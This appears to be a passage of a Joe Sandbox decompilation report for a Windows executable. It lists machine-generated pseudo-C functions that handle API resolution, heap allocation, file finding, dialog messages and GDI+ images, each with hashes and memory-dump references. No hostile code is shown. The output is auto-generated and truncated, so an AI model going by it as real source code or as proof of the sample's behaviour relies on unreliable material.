                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c49b81e274718ec18602c8f4e6d54cc8e497f137631afda0e5cba4b845c7f21f
                • Instruction ID: 28f68496eda65be0ba2f75a8b0d35c218a07fc66484777b367bf35fea09ca6e3
                • Opcode Fuzzy Hash: c49b81e274718ec18602c8f4e6d54cc8e497f137631afda0e5cba4b845c7f21f
                • Instruction Fuzzy Hash: A9316B75C04299ABCF16DF69D9519EEBBB4AF09300F1045AEE409BB282D735AE04CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E003FAC98(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
                				struct HINSTANCE__* _t13;
                				signed int* _t20;
                				signed int _t27;
                				signed int _t28;
                				signed int _t29;
                				signed int _t33;
                				intOrPtr* _t34;
                
                				_t20 = 0x432628 + _a4 * 4;
                				_t27 =  *0x40e7ac; // 0xc24f6281
                				_t29 = _t28 | 0xffffffff;
                				_t33 = _t27 ^  *_t20;
                				asm("ror esi, cl");
                				if(_t33 == _t29) {
                					L14:
                					return 0;
                				}
                				if(_t33 == 0) {
                					_t34 = _a12;
                					if(_t34 == _a16) {
                						L7:
                						_t13 = 0;
                						L8:
                						if(_t13 == 0) {
                							L13:
                							_push(0x20);
                							asm("ror edi, cl");
                							 *_t20 = _t29 ^ _t27;
                							goto L14;
                						}
                						_t33 = GetProcAddress(_t13, _a8);
                						if(_t33 == 0) {
                							_t27 =  *0x40e7ac; // 0xc24f6281
                							goto L13;
                						}
                						 *_t20 = E003F7CA3(_t33);
                						goto L2;
                					} else {
                						goto L4;
                					}
                					while(1) {
                						L4:
                						_t13 = E003FAD34( *_t34); // executed
                						if(_t13 != 0) {
                							break;
                						}
                						_t34 = _t34 + 4;
                						if(_t34 != _a16) {
                							continue;
                						}
                						_t27 =  *0x40e7ac; // 0xc24f6281
                						goto L7;
                					}
                					_t27 =  *0x40e7ac; // 0xc24f6281
                					goto L8;
                				}
                				L2:
                				return _t33;
                			}

                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 003FACF8
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 4d0dc59da0fec40ec02688daac839861c17e29e5482ed32191ae041fcd0f39cf
                • Instruction ID: c899f7c6e87aa45e079391cd0f3f0807696b4cdfdbecce18cdd74b66c89d13e8
                • Opcode Fuzzy Hash: 4d0dc59da0fec40ec02688daac839861c17e29e5482ed32191ae041fcd0f39cf
                • Instruction Fuzzy Hash: 7D1136B7A00A2D5FDB239E29EC5087AB395ABC032071B4630FE19EB254D730EC0197D2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 55%
                			E003D9215(void* __ebx, void* __edi, void* __eflags) {
                				void* _t21;
                				intOrPtr _t27;
                				intOrPtr _t36;
                				void* _t38;
                				intOrPtr _t39;
                				void* _t41;
                				void* _t48;
                
                				E003EEB78(0x402895, _t41);
                				E003D13BA(_t41 - 0x20, E003D7C64());
                				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                				_t39 = E003DD114( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 - 0x20)),  *((intOrPtr*)(_t41 - 0x1c)), _t38);
                				if(_t39 > 0) {
                					_t27 =  *((intOrPtr*)(_t41 + 0x10));
                					_t36 =  *((intOrPtr*)(_t41 + 0xc));
                					do {
                						_t48 = 0 - _t27;
                						if(_t48 > 0 || _t48 >= 0 && _t39 >= _t36) {
                							_t39 = _t36;
                						}
                						if(_t39 > 0) {
                							E003DD300( *((intOrPtr*)(_t41 + 8)), _t41,  *((intOrPtr*)(_t41 - 0x20)), _t39);
                							asm("cdq");
                							_t36 = _t36 - _t39;
                							asm("sbb ebx, edx");
                						}
                						_push( *((intOrPtr*)(_t41 - 0x1c)));
                						_push( *((intOrPtr*)(_t41 - 0x20)));
                						_t39 = E003DD114( *((intOrPtr*)(_t41 + 8)));
                					} while (_t39 > 0);
                				}
                				_t21 = E003D15FB(_t41 - 0x20); // executed
                				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                				return _t21;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 4951a7625cc67e6a1ff8fb2e0a74b2e344a7344c6dbd0cdaca1a4ae4a5782e27
                • Instruction ID: c177b6d14416840954ca8d8daf94cbd082370c2ea663cf6664b0581afdeaa63c
                • Opcode Fuzzy Hash: 4951a7625cc67e6a1ff8fb2e0a74b2e344a7344c6dbd0cdaca1a4ae4a5782e27
                • Instruction Fuzzy Hash: CD016537900578ABCF13ABA8DD81ADEB735AF88750F014627E816BB352DA348D04C6A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E003EDA52(void* __ecx, void* __edx, void* __eflags) {
                				void* __ebx;
                				intOrPtr _t19;
                				char _t20;
                				char _t21;
                				void* _t24;
                				void* _t25;
                				void* _t38;
                				void* _t44;
                				intOrPtr _t46;
                
                				_t38 = __edx;
                				E003EEB78(0x402b3c, _t44);
                				_push(__ecx);
                				E003EEC50(0x2108);
                				_push(_t25);
                				 *((intOrPtr*)(_t44 - 0x10)) = _t46;
                				E003F6066(0x425872, "X");
                				E003E0659(0x427894, _t38, 0x4035f0);
                				E003F6066(0x426892,  *((intOrPtr*)(_t44 + 0xc)));
                				E003D5B3D(0x41c578, _t38,  *((intOrPtr*)(_t44 + 0xc)));
                				_t4 = _t44 - 4;
                				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                				_t19 = 2;
                				 *0x424850 = _t19;
                				 *0x42484c = _t19;
                				 *0x424848 = _t19;
                				_t20 =  *0x418461; // 0x0
                				 *0x4236d3 = _t20;
                				_t21 =  *0x418462; // 0x1
                				 *0x42370c = 1;
                				 *0x42370f = 1;
                				 *0x4236d4 = _t21;
                				E003D7B0D(_t44 - 0x2118, _t38,  *_t4, 0x41c578);
                				 *(_t44 - 4) = 1;
                				E003D7C7D(_t44 - 0x2118, _t38,  *_t4);
                				_t24 = E003D7B9E(_t25, _t44 - 0x2118); // executed
                				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
                				return _t24;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 003EDA57
                  • Part of subcall function 003E0659: _wcslen.LIBCMT ref: 003E066F
                  • Part of subcall function 003D7B0D: __EH_prolog.LIBCMT ref: 003D7B12
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$_wcslen
                • String ID:
                • API String ID: 2838827086-0
                • Opcode ID: f79eea7c1a2f2ace4b6b667aaac4ef082024115f95f2527afda73d99956214e3
                • Instruction ID: d94911bff7aa2a00070fa902cdd34018e7c67af1f918f7e88789bfb9bebf1af4
                • Opcode Fuzzy Hash: f79eea7c1a2f2ace4b6b667aaac4ef082024115f95f2527afda73d99956214e3
                • Instruction Fuzzy Hash: 21112B76608294AED722EF94BC077DC3BB4DB15310F5080AFF1009A3D2DBB91644CB69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003F3C0D(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                				_Unknown_base(*)()* _t10;
                				struct HINSTANCE__* _t12;
                				_Unknown_base(*)()* _t13;
                				_Unknown_base(*)()** _t19;
                				signed int _t20;
                				signed int _t21;
                
                				_t19 = 0x4320ec + _a4 * 4;
                				_t10 =  *_t19;
                				_t21 = _t20 | 0xffffffff;
                				if(_t10 == _t21) {
                					L6:
                					return 0;
                				}
                				if(_t10 == 0) {
                					_t12 = E003F3B72(__ecx, _a12, _a16); // executed
                					if(_t12 == 0) {
                						L5:
                						 *_t19 = _t21;
                						goto L6;
                					}
                					_t13 = GetProcAddress(_t12, _a8);
                					if(_t13 == 0) {
                						goto L5;
                					}
                					 *_t19 = _t13;
                					return _t13;
                				}
                				return _t10;
                			}

                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 003F3C3F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 6031710eaf1a9fc264a77cca61eb74ccde269bb8a6346823866a59946874acf1
                • Instruction ID: 8fc6e520ba5dbf4a20f02515bdee142488893432f068ca7937c47823860c092e
                • Opcode Fuzzy Hash: 6031710eaf1a9fc264a77cca61eb74ccde269bb8a6346823866a59946874acf1
                • Instruction Fuzzy Hash: 43F0E53220021E9FCF178EA8EC009AA77ADEF01B217104135FB05E7190DB31DA20C790
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E003F8E06(void* __ecx, long _a4) {
                				void* _t4;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                				long _t9;
                
                				_t7 = __ecx;
                				_t9 = _a4;
                				if(_t9 > 0xffffffe0) {
                					L7:
                					 *((intOrPtr*)(E003F91A8())) = 0xc;
                					__eflags = 0;
                					return 0;
                				}
                				if(_t9 == 0) {
                					_t9 = _t9 + 1;
                				}
                				while(1) {
                					_t4 = RtlAllocateHeap( *0x4326e4, 0, _t9); // executed
                					if(_t4 != 0) {
                						break;
                					}
                					__eflags = E003F8C34();
                					if(__eflags == 0) {
                						goto L7;
                					}
                					_t6 = E003F7A5E(_t7, _t8, __eflags, _t9);
                					_pop(_t7);
                					__eflags = _t6;
                					if(_t6 == 0) {
                						goto L7;
                					}
                				}
                				return _t4;
                			}









                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 84f759744d688a4324340e0ead2b610c75cb6b339fd39d206d12ce652cfe3f20
                • Instruction ID: e5cf939b3ef8cc3b22110de3e2fa202b5b4dc4b4c7d680f6306174ffbad8c6d2
                • Opcode Fuzzy Hash: 84f759744d688a4324340e0ead2b610c75cb6b339fd39d206d12ce652cfe3f20
                • Instruction Fuzzy Hash: 6DE06D3560622D67EA7B2B659D05BBF7A4C9F617A4F160121AE18AA191CF60CC0082E5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E003D5ABD(intOrPtr __ecx, void* __eflags) {
                				void* _t36;
                
                				E003EEB78(0x402739, _t36);
                				_push(__ecx);
                				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
                				E003DB505(__ecx); // executed
                				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                				E003E0637();
                				 *(_t36 - 4) = 1;
                				E003E0637();
                				 *(_t36 - 4) = 2;
                				E003E0637();
                				 *(_t36 - 4) = 3;
                				E003E0637();
                				 *(_t36 - 4) = 4;
                				E003E0637();
                				 *(_t36 - 4) = 5;
                				E003D5CAC(__ecx,  *(_t36 - 4));
                				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                				return __ecx;
                			}





                APIs
                • __EH_prolog.LIBCMT ref: 003D5AC2
                  • Part of subcall function 003DB505: __EH_prolog.LIBCMT ref: 003DB50A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6aacdabfb83dc8ecaec08ad0562e0c8e5f4c6fdf56aa9d57efa7e6aacde37fd1
                • Instruction ID: 9dc4e522bcee0e5e9564c8b288c5dc0c6c18311b9c9f02f1e414f2ed1270171c
                • Opcode Fuzzy Hash: 6aacdabfb83dc8ecaec08ad0562e0c8e5f4c6fdf56aa9d57efa7e6aacde37fd1
                • Instruction Fuzzy Hash: 860181304106E0DAD71AE7B8D0457DDF7A4DF94304F50858EA4565B2C2CBF82B08D7A2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E003D9620(void* __ecx) {
                				void* _t16;
                				void* _t21;
                
                				_t21 = __ecx;
                				_t16 = 1;
                				if( *(__ecx + 8) != 0xffffffff) {
                					if( *((char*)(__ecx + 0x15)) == 0 &&  *((intOrPtr*)(__ecx + 0x10)) == 0) {
                						_t5 = FindCloseChangeNotification( *(__ecx + 8)) - 1; // -1
                						asm("sbb bl, bl");
                						_t16 =  ~_t5 + 1;
                					}
                					 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
                				}
                				 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0x00000000;
                				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1e)) != _t16) {
                					E003D6BD5(0x411098, _t21 + 0x32);
                				}
                				return _t16;
                			}






                APIs
                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003D95D6,?,?,?,?,?,00402641,000000FF), ref: 003D963B
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 9d5b9660f98ec1c4d44c7f6a8e74641f8996b04954a8b4a17e853402dfb168fe
                • Instruction ID: 4382d0e103fb8c79351f55690db18b7619ab374262d0bfeab20981cb8a367751
                • Opcode Fuzzy Hash: 9d5b9660f98ec1c4d44c7f6a8e74641f8996b04954a8b4a17e853402dfb168fe
                • Instruction Fuzzy Hash: 6AF08972485B15DFDB328A34D45879277E86B12331F045B5FD0F742AE0D771A98D8B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DA56D(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
                				void* _t13;
                				intOrPtr _t19;
                
                				_t19 = _a8;
                				 *((char*)(_t19 + 0x1044)) = 0;
                				if(E003DBDB4(_a4) != 0) {
                					L3:
                					return 0;
                				}
                				_t13 = E003DA69B(0xffffffff, _a4, _t19); // executed
                				if(_t13 == 0xffffffff) {
                					goto L3;
                				}
                				FindClose(_t13); // executed
                				 *(_t19 + 0x1040) =  *(_t19 + 0x1040) & 0x00000000;
                				 *((char*)(_t19 + 0x100c)) = E003DA28F( *((intOrPtr*)(_t19 + 0x1008)));
                				 *((char*)(_t19 + 0x100d)) = E003DA2A6( *((intOrPtr*)(_t19 + 0x1008)));
                				return 1;
                			}






                APIs
                  • Part of subcall function 003DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6C4
                  • Part of subcall function 003DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6F2
                  • Part of subcall function 003DA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6FE
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003DA598
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Find$FileFirst$CloseErrorLast
                • String ID:
                • API String ID: 1464966427-0
                • Opcode ID: 7d06435e11f0708e8aece1b4877c40945ca4d0f868352067cbbcb1de567ab22e
                • Instruction ID: 9a4a8391a8f01f344778f397bec3801479fcc9306f6bd1f771a5a1995685f682
                • Opcode Fuzzy Hash: 7d06435e11f0708e8aece1b4877c40945ca4d0f868352067cbbcb1de567ab22e
                • Instruction Fuzzy Hash: D2F08933009B90EACF235BB46A047C7BB956F16331F058E4BF1FD56296C27550989B23
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E003E0E08() {
                				void* __esi;
                				void* _t2;
                
                				L003E1B58(); // executed
                				_t2 = E003E1B5D();
                				if(_t2 != 0) {
                					_t2 = E003D6C31(_t2, 0x411098, 0xff, 0xff);
                				}
                				if( *0x4110a4 != 0) {
                					_t2 = E003D6C31(_t2, 0x411098, 0xff, 0xff);
                				}
                				__imp__SetThreadExecutionState(1);
                				return _t2;
                			}






                APIs
                • SetThreadExecutionState.KERNEL32 ref: 003E0E3D
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 3e8ceac23f81f0b2f1f16aa09c6682fbc01ff338720164bc4f8cd7c823d46b60
                • Instruction ID: 18298d18d12e474fb6cb78a5f92b7d5102dc621b4b4bf5d67da013d9119b766e
                • Opcode Fuzzy Hash: 3e8ceac23f81f0b2f1f16aa09c6682fbc01ff338720164bc4f8cd7c823d46b60
                • Instruction Fuzzy Hash: FBD0C221E110E556DE17332A38567FE290A8FCB311F0E0137B2496F6D6CBA808C2A261
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E003EA626(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				void* _t6;
                
                				_push(__ecx);
                				_push(0x10);
                				L003EEB02();
                				_v8 = __eax;
                				if(__eax == 0) {
                					return 0;
                				}
                				_t6 = E003EA3B9(__eax, _a4, _a8); // executed
                				return _t6;
                			}






                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 003EA62C
                  • Part of subcall function 003EA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003EA3DA
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                • Instruction ID: dd60b7d847162f8f4f8cc1dfec2bd83c027384ae1be486e2aab488ca67a8356d
                • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                • Instruction Fuzzy Hash: A9D0C971214659BADF436B638C12A6E7A9AFB01340F048225B842D92D1EAB1ED10A662
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EDD6D(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                				void* _t7;
                
                				SendDlgItemMessageW( *0x418458, 0x6a, 0x402, E003E0264(_a20, _a24, _a28, _a32), 0); // executed
                				_t7 = E003EB568(); // executed
                				return _t7;
                			}




                0x003edd92
                0x003edd98
                0x003edd9d

                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,003E1B3E), ref: 003EDD92
                  • Part of subcall function 003EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                  • Part of subcall function 003EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                  • Part of subcall function 003EB568: IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                  • Part of subcall function 003EB568: TranslateMessage.USER32(?), ref: 003EB5AC
                  • Part of subcall function 003EB568: DispatchMessageW.USER32(?), ref: 003EB5B6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 815dc13cf624ed726b74e83499c88c5faede7d98870ff7d90a5c7549a22b5a41
                • Instruction ID: 8fa33a80568ea5dfbe1ebed6439c99046e90185a02bac65646bddbd110a808db
                • Opcode Fuzzy Hash: 815dc13cf624ed726b74e83499c88c5faede7d98870ff7d90a5c7549a22b5a41
                • Instruction Fuzzy Hash: 0AD0C731144340BAEA032B52DD06F0F7AE2FB88B05F004A54B384740F1CAB29D71DF15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E003EE5BB(void* __esi) {
                				void* _t2;
                				intOrPtr _t5;
                				void* _t6;
                				void* _t11;
                
                				_t11 = __esi;
                				if(( *0x405650 & 0x00001000) == 0) {
                					return _t2;
                				} else {
                					E003EE664();
                					_t5 =  *0x431ce8 + 1;
                					 *0x431ce8 = _t5;
                					if(_t5 == 1) {
                						E003EE78D(4, 0x431cec); // executed
                					}
                					_t6 = E003EE5EE();
                					if(_t6 == 0) {
                						 *0x431ce4 = 0;
                						return _t6;
                					} else {
                						 *0x403278(0x431ce4, _t11);
                						return  *((intOrPtr*)( *0x431ce0))();
                					}
                				}
                			}








                APIs
                • DloadProtectSection.DELAYIMP ref: 003EE5E3
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
